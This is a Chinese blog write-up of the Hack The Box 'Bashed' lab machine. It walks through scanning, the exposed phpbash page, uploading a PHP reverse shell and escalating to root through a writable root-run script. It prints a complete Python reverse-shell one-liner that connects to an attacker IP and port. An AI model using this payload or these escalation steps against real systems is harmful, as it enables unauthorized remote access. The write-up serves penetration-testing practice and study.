
【HTB】Bashed靶机
发布日期:2021-05-09 17:13:28
浏览次数:12
分类:精选文章
本文共 888 字,大约阅读时间需要 2 分钟。
文章目录
过程概述
- nmap扫描靶机,开放了80http服务。
- dirsearch扫描网站目录。
- nikto扫描网站漏洞。
- 手动访问网站,发现了phpbash的介绍页面,了解了下感觉可以利用,需要找到phpbash.php页面。根据dirsearch和nikto的扫描结果中,找到了在dev/phpbash.php。获取user.txt
- 网站目录下的uploads文件夹具有可写入权限,上传回连shell的PHP文件,并浏览器访问,成功建立连接。
- sudo -l,发现可以以scriptmanager用户执行任何命令,sudo -u scriptmanager bash -i,切换到scriptmanager下的bash。
- /scripts目录下有个test.py目录,可以写入,并且定期会以root命令执行,想test.py中重新写入回连shell,开启监听,等一段时间后建立连接,获取root.txt。
关键步骤
回连shell1
用的是/usr/share/laudanum/php/php-reverse-shell.php,修改相应的IP和端口。
本地修改后,在靶机上用wget下载到uploads目录下。http://pentestmonkey.net/tools/web-shells/php-reverse-shell
回连shell2
用的echo将脚本写入到了test.py文件中。
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.5",8899));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
发表评论
最新留言
能坚持,总会有不一样的收获!
[***.219.124.196]2025年04月13日 09时34分05秒
关于作者

喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!
推荐文章
分布式理论 PACELC 了解么?
2021-05-09
对比讲解lambda表达式与传统接口函数实现方式
2021-05-09
真的简单,文本文件逐行处理–用java8 Stream流的方式
2021-05-09
使用java8API遍历过滤文件目录及子目录及隐藏文件
2021-05-09
精讲响应式WebClient第2篇-GET请求阻塞与非阻塞调用方法详解
2021-05-09
java9系列第二篇-资源自动关闭的语法增强
2021-05-09
Java9系列第九篇-对HTTP2协议的支持与非阻塞HTTP-API
2021-05-09
go语言系列--golang在windows上的安装和开发环境goland的配置
2021-05-09
CoreCLR源码探索(八) JIT的工作原理(详解篇)
2021-05-09
【数组】59. 螺旋矩阵 II
2021-05-09
【哈希表】1. 两数之和
2021-05-09
【字符串】28. 实现 strStr()
2021-05-09
【栈和队列】232. 用栈实现队列
2021-05-09
WIFI6 基本知识(二)
2021-05-09
安装Pyte失败的解决方法
2021-05-09
flink 1.7.2 安装详解
2021-05-09
linux权限管理
2021-05-09
linux之压缩和解压
2021-05-09